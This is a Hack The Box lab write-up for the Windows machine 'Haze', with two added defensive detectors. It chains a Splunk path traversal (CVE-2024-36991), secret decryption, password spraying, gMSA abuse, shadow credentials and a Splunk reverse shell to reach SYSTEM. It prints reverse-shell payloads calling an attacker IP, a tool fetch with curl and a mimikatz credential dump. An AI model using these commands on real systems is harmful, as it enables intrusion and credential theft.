Hack The Box / WINDOWS / 2026-03-18
Hack The Box — Haze (Windows)
A Splunk path traversal leaks secrets and LDAP bind credentials, enabling AD pivoting through reused passwords and gMSA abuse, then shadow credentials and Splunk admin RCE lead to SYSTEM and Administrator compromise.
Target
- IP: 10.129.21.181
Recon
sudo nmap -sC -sV 10.129.21.181 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-02 21:06:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: E60C968E8FF3CC2F4FB869588E83AFC6
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.129.21.181:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
8088/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after: 2028-03-04T07:29:08
| MD5: 82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
|_SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
|_http-server-header: Splunkd
|_http-title: 404 Not Found
| http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
8089/tcp open ssl/http Splunkd httpd
|_http-server-header: Splunkd
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after: 2028-03-04T07:29:08
| MD5: 82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
|_SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry
|_/
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49680/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49684/tcp open msrpc Microsoft Windows RPC
58531/tcp open msrpc Microsoft Windows RPC
58534/tcp open msrpc Microsoft Windows RPC
58545/tcp open msrpc Microsoft Windows RPC
58560/tcp open msrpc Microsoft Windows RPC
59065/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Add dc01.haze.htb and haze.htb to /etc/hosts.
Browse to http://10.129.21.181:8000/.
It is Splunk Enterprise.
Browse to https://10.129.21.181:8088/.
From the certificate we get:
emailAddress = support@splunk.com
CN = SplunkCommonCA
O = Splunk
L = San Francisco
ST = CA
C = US
Browse to https://10.129.21.181:8089/.
We see:
Updated: 2025-04-02T15:10:45-07:00 Splunk build: 9.2.1
So we have the Splunk version: 9.2.1.
Initial Access via Splunk Traversal
There is a vulnerability (CVE-2024-36991) with a public exploit.
git clone https://github.com/bigb0x/CVE-2024-36991.git
python3 CVE-2024-36991/CVE-2024-36991.py -u 'http://10.129.21.181:8000'
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152
The exploit sends this request:
http://10.129.21.181:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
So this is a directory traversal issue.
Open this URL manually:
http://10.129.21.181:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
You can intercept and replay it in Burp Repeater.
It leaks Splunk password hashes (same values printed by the exploit).
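As an added, defensive illustration (not code from the original post or from the exploit repository): the traversal request above leaves a clear trace in Splunk Web's access log, and the detector below flags it. The log lines, the source IP and the field layout are constructed to mirror the web_access.log format and are not real traffic from the box.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the shape of Splunk Web's web_access.log (not
# real traffic): a benign login request, the exploit-style request shown above,
# a percent-encoded variant that a naive substring match for "C:../" would
# miss, and a legitimate static file under the same module path.
SAMPLE_LOG = """\
10.10.14.5 - - [02/Apr/2025:21:06:11.123 +0000] "GET /en-US/account/login?return_to=%2Fen-US%2F HTTP/1.1" 200 4231 "-" "Mozilla/5.0"
10.10.14.5 - - [02/Apr/2025:21:07:02.410 +0000] "GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1" 200 986 "-" "python-requests/2.31"
10.10.14.5 - - [02/Apr/2025:21:07:05.002 +0000] "GET /en-US/modules/messaging/C%3A%2E%2E/C%3A%2E%2E/etc/auth/splunk.secret HTTP/1.1" 200 254 "-" "curl/8.5"
10.10.14.5 - - [02/Apr/2025:21:08:00.000 +0000] "GET /en-US/modules/messaging/messaging.js HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A path segment that walks up a directory: plain ".." or the Windows
# drive-letter form "C:.." that the CVE-2024-36991 request relies on.
TRAVERSAL_SEGMENT_RE = re.compile(r'^(?:[A-Za-z]:)?\.\.$')


def decode_path(target: str) -> str:
    """Drop the query string, percent-decode twice (to catch double encoding)
    and normalise backslashes so the segment check sees a single form."""
    path = target.split("?", 1)[0]
    path = unquote(unquote(path))
    return path.replace("\\", "/")


def is_traversal(target: str) -> bool:
    """True if any segment of the decoded path is a traversal segment."""
    return any(TRAVERSAL_SEGMENT_RE.match(seg) for seg in decode_path(target).split("/"))


def find_traversal_attempts(log_text: str) -> list[dict]:
    """One finding per log line whose request path contains a traversal
    segment, with the source IP, raw target and decoded path so an analyst can
    see which file was requested and whether the messaging endpoint was used."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or not is_traversal(m.group("target")):
            continue
        decoded = decode_path(m.group("target"))
        findings.append({
            "src_ip": line.split(" ", 1)[0],
            "target": m.group("target"),
            "decoded": decoded,
            "under_messaging": "/modules/messaging/" in decoded,
        })
    return findings


if __name__ == "__main__":
    for f in find_traversal_attempts(SAMPLE_LOG):
        print(f"{f['src_ip']} requested {f['decoded']}")
```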
This page explains the Splunk hash format:
https://asecuritysite.com/hash/splunk_hash
Create a file named hash:
admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1
edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1
mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/
paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1
Try cracking:
./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt --username
None of the hashes crack.
Note: Local Splunk Lab (optional)
This machine does not require this step, but here is a useful way to inspect Splunk locally.
docker run -d -p 8000:8000 -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=password" --name splunk splunk/splunk:latest
docker ps -a
Copy the container ID and enter the container:
docker exec -u0 -it c851fa2860c4 bash
You can browse /opt/splunk.
That image is RHEL-based with limited tooling, so an Ubuntu container works too.
docker run -it ubuntu:latest
apt update
apt install curl wget vim
Download Splunk without registration by scraping direct links:
curl https://www.splunk.com/en_us/download/splunk-enterprise.html | grep data-link
For example:
cd /opt
wget https://download.splunk.com/products/splunk/releases/9.4.1/linux/splunk-9.4.1-e3bdab203ac8-linux-amd64.tgz
tar xvf splunk-9.4.1-e3bdab203ac8-linux-amd64.tgz
cd splunk
vim etc/splunk-launch.conf
Add this line:
OPTIMISTIC_ABOUT_FILE_LOCKING=1
Start Splunk:
./bin/splunk start
Now you can inspect the filesystem and decrypt test values safely.
Extract and Decrypt Splunk Secrets
From public docs and research we know the Splunk secret key is stored in etc/auth/splunk.secret.
Leak it via traversal:
/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/auth/splunk.secret
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
Leak server.conf too:
/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/server.conf
[general]
serverName = dc01
pass4SymmKey = $7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA==
[sslConfig]
sslPassword = $7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw==
In the local Splunk lab, replace its splunk.secret with the target one, then decrypt:
./bin/splunk show-decrypted --value '$7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA=='
changeme
./bin/splunk show-decrypted --value '$7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw=='
password
Alternative: splunksecrets.
pip3 install splunksecrets
Put leaked secret into secret.txt and run:
splunksecrets splunk-decrypt --splunk-secret secret.txt
Provide the encrypted value at the prompt and get the plaintext.
Those two decrypted values are not directly useful for compromise.
Leak LDAP auth config:
/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/authentication.conf
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
Decrypt bindDNpassword with either splunk show-decrypted or splunksecrets.
Recovered password:
Ld@p_Auth_Sp1unk@2k24
The bind user is Paul Taylor.
AD Pivoting
Put paul.taylor in users.txt and validate the user:
./kerbrute userenum -d haze.htb --dc dc01.haze.htb ./users.txt
2025/04/02 19:31:32 > [+] VALID USERNAME: paul.taylor@haze.htb
Try SMB with the recovered creds:
nxc smb dc01.haze.htb -d haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --shares
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 [*] Enumerated shares
SMB 10.10.11.61 445 DC01 Share Permissions Remark
SMB 10.10.11.61 445 DC01 ----- ----------- ------
SMB 10.10.11.61 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.61 445 DC01 C$ Default share
SMB 10.10.11.61 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.61 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.61 445 DC01 SYSVOL READ Logon server share
LDAP also works:
nxc ldap dc01.haze.htb -d haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.61 389 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
Enumerate users:
nxc smb dc01.haze.htb -d haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users_2.txt
Run a password spray (after syncing time with the DC):
sudo ntpdate dc01.haze.htb
./kerbrute --dc dc01.haze.htb -d haze.htb -v passwordspray users_2.txt 'Ld@p_Auth_Sp1unk@2k24'
2025/04/03 07:27:32 > [+] VALID LOGIN: paul.taylor@haze.htb:Ld@p_Auth_Sp1unk@2k24
2025/04/03 07:27:32 > [+] VALID LOGIN: mark.adams@haze.htb:Ld@p_Auth_Sp1unk@2k24
Get a shell as Mark:
evil-winrm -i dc01.haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24'
gMSA Abuse and Shadow Credentials
Collect BloodHound data:
bloodhound-python -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -ns 10.10.11.61 -d 'haze.htb' -dc 'dc01.haze.htb' -c All --zip
Then:
sudo neo4j console
bloodhound --no-sandbox
Upload the zip.
For mark.adams in Node Info → Transitive Object Control, we see he is a member of gmsa_managers.
On target:
Get-ADServiceAccount 'Haze-IT-Backup$'
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled : True
Name : Haze-IT-Backup
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780
SamAccountName : Haze-IT-Backup$
SID : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :
This is a Group Managed Service Account (gMSA).
Run gMSADumper (https://github.com/micahvandeusen/gMSADumper):
python3 gMSADumper/gMSADumper.py -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb
Users or groups who can read password for Haze-IT-Backup$:
> Domain Admins
Check retrieval principals:
Get-ADServiceAccount 'Haze-IT-Backup$' -Properties PrincipalsAllowedToRetrieveManagedPassword
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled : True
Name : Haze-IT-Backup
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Domain Admins,CN=Users,DC=haze,DC=htb}
SamAccountName : Haze-IT-Backup$
SID : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :
Change the retrieval principal to mark.adams:
Set-ADServiceAccount 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'
Upload and run GMSAPasswordReader.exe:
.\GMSAPasswordReader --AccountName 'Haze-IT-Backup$'
[*] Input username : Haze-IT-Backup$
[*] Input domain : HAZE.HTB
[*] Salt : HAZE.HTBHaze-IT-Backup$
[*] rc4_hmac : 735C02C6B2DC54C3C8C6891F55279EBC
[*] aes128_cts_hmac_sha1 : FDE2DBD661BE96B4AC1F68036104A22B
[*] aes256_cts_hmac_sha1 : BBD639BFE8461AEC4F850A5500422767C4EF51E9FD26D0003C9653ED4571EA15
[*] des_cbc_md5 : 9EA2310B9D2A94AB
Use the RC4 hash to request a TGT:
getTGT.py 'haze.htb'/'Haze-IT-Backup$' -hashes ':735C02C6B2DC54C3C8C6891F55279EBC' -dc-ip 10.10.11.61
[*] Saving ticket in Haze-IT-Backup$.ccache
export KRB5CCNAME='Haze-IT-Backup$.ccache'
BloodHound shows Haze-IT-Backup$ has WriteOwner on group support_services.
owneredit.py -action write -new-owner 'Haze-IT-Backup$' -target 'support_services' -dc-ip 10.10.11.61 -k -no-pass 'haze.htb'/'Haze-IT-Backup$'
[*] Current owner information below
[*] - SID: S-1-5-21-323145914-28650650-2368316563-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=haze,DC=htb
[*] OwnerSid modified successfully!
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'Haze-IT-Backup$' -target 'support_services' -dc-ip 10.10.11.61 -k -no-pass 'haze.htb'/'Haze-IT-Backup$'
[*] DACL backed up to dacledit-20250403-101115.bak
[*] DACL modified successfully!
python3 bloodyAD/bloodyAD.py --host 'dc01.haze.htb' -d haze.htb --dc-ip 10.10.11.61 -k add genericAll 'support_services' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ has now GenericAll on support_services
python3 bloodyAD/bloodyAD.py --host 'dc01.haze.htb' -d haze.htb --dc-ip 10.10.11.61 -k add groupMember 'support_services' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ added to support_services
Use pyWhisker for shadow credentials:
git clone https://github.com/ShutdownRepo/pywhisker.git
python3 pywhisker/pywhisker.py -d 'haze.htb' -u 'Haze-IT-Backup$' -H '735C02C6B2DC54C3C8C6891F55279EBC' --target 'edward.martin' --action 'add'
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: eb654fd5-4612-f97d-22bb-3484012bcc1e
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: qmryplGi.pfx
[*] Must be used with password: wWiGgGgZnOdfIG7KtIAl
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Get the NT hash through certificate authentication:
certipy cert -export -pfx qmryplGi.pfx -password wWiGgGgZnOdfIG7KtIAl -out "unprotected.pfx"
certipy auth -pfx unprotected.pfx -dc-ip 10.10.11.61 -username 'edward.martin' -domain 'haze.htb'
[*] Got hash for 'edward.martin@haze.htb': aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af
Get a shell:
evil-winrm -i 10.10.11.61 -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'
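As an added, defender-side illustration of the two writes in this section (not code from the original post or from any of the tools used): changing PrincipalsAllowedToRetrieveManagedPassword updates the msDS-GroupMSAMembership attribute, and the shadow-credentials step writes msDS-KeyCredentialLink; with "Audit Directory Service Changes" enabled and a SACL on the objects, both surface as Security Event ID 5136. The event records, the allow-listed account svc_intune and the triage rules are constructed for this example.

```python
# Constructed, simplified records in the shape of Windows Security Event ID
# 5136 (Directory Service Changes). Field names follow the event's data names;
# values are made up to mirror the two writes described in this section.
VALUE_ADDED = "%%14674"  # OperationType code for "Value Added" in event 5136

SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "mark.adams", "ObjectClass": "msDS-GroupManagedServiceAccount",
     "ObjectDN": "CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb",
     "AttributeLDAPDisplayName": "msDS-GroupMSAMembership", "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "Haze-IT-Backup$", "ObjectClass": "user",
     "ObjectDN": "CN=Edward Martin,CN=Users,DC=haze,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    # Constructed benign write: a device-provisioning account (svc_intune is a
    # placeholder name) adding a key credential to a computer object.
    {"EventID": 5136, "SubjectUserName": "svc_intune", "ObjectClass": "computer",
     "ObjectDN": "CN=WS01,CN=Computers,DC=haze,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "mark.adams", "ObjectClass": "user",
     "ObjectDN": "CN=Mark Adams,CN=Users,DC=haze,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
]

# Attributes whose modification hands out a credential path rather than
# changing ordinary account metadata.
WATCHED = {
    "msDS-GroupMSAMembership": "gMSA password-retrieval principals changed",
    "msDS-KeyCredentialLink": "key credential added (possible shadow credentials)",
}

# Per-attribute allow-list of writers with a legitimate reason to touch the
# attribute (device-join or Windows Hello provisioning accounts for
# KeyCredentialLink). Nobody is expected to rewrite gMSA retrieval principals
# outside change control, so that list is empty. Placeholder values.
ALLOWED_WRITERS = {
    "msDS-KeyCredentialLink": {"svc_intune"},
    "msDS-GroupMSAMembership": set(),
}


def triage_ds_changes(events):
    """Return one alert per 5136 'Value Added' event that writes a watched
    attribute and whose actor is not allow-listed for that attribute."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("OperationType") != VALUE_ADDED:
            continue
        attr = ev.get("AttributeLDAPDisplayName")
        if attr not in WATCHED or ev["SubjectUserName"] in ALLOWED_WRITERS[attr]:
            continue
        alerts.append({"reason": WATCHED[attr], "actor": ev["SubjectUserName"],
                       "target": ev["ObjectDN"], "object_class": ev["ObjectClass"]})
    return alerts


if __name__ == "__main__":
    for a in triage_ds_changes(SAMPLE_EVENTS):
        print(f"{a['actor']} -> {a['target']}: {a['reason']}")
```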
Splunk Backup and Admin Compromise
Inside the shell:
cd C:\Backups\Splunk
ls
There is a file splunk_backup_2024-08-06.zip.
Transfer it to the attacker machine.
On attacker:
smbserver.py -smb2support -username test12 -password test12 share $(pwd)
On target:
net use \\10.10.15.10\share test12 /USER:test12
cp splunk_backup_2024-08-06.zip \\10.10.15.10\share\
On attacker:
unzip splunk_backup_2024-08-06.zip
cd Splunk
find . -name authentication.conf
./etc/system/default/authentication.conf
./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
./var/run/splunk/confsnapshot/baseline_default/system/default/authentication.conf
Inspect the local baseline:
cat ./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
We see:
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
Use splunksecrets legacy decrypt:
splunksecrets splunk-legacy-decrypt --splunk-secret etc/auth/splunk.secret
Paste $1$YDz8WfhoCWmf6aTRkA+QqUI= at the prompt and recover:
Sp1unkadmin@2k24
Log in to http://10.129.21.181:8000/ with:
admin:Sp1unkadmin@2k24
Use this Splunk reverse-shell method:
https://github.com/0xjpuff/reverse_shell_splunk
Start listener:
rlwrap nc -vlnp 4444
Follow repository steps and get reverse shell.
whoami
haze\alexander.green
whoami /priv
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Generate and run a Meterpreter payload to escalate:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.15.10 LPORT=4444 -f exe -o reverse.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run
On target:
.\reverse.exe
In meterpreter:
getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
getuid
Server username: NT AUTHORITY\SYSTEM
Then:
shell
Now retrieve the root flag from the Administrator desktop.
Bonus: Administrator NTLM Hash
Upload mimikatz:
https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe
curl http://192.168.99.1:5555/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe "lsadump::sam" exit
Output includes:
Domain : DC01
SysKey : 7ec056149ebcce76129c0b9f327f8308
Local SID : S-1-5-21-466278413-650384940-2880913266
SAMKey : 72cd7f59f8d65f63ae093407583ae822
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3aac437da6f5ae94b01a6e5347dd920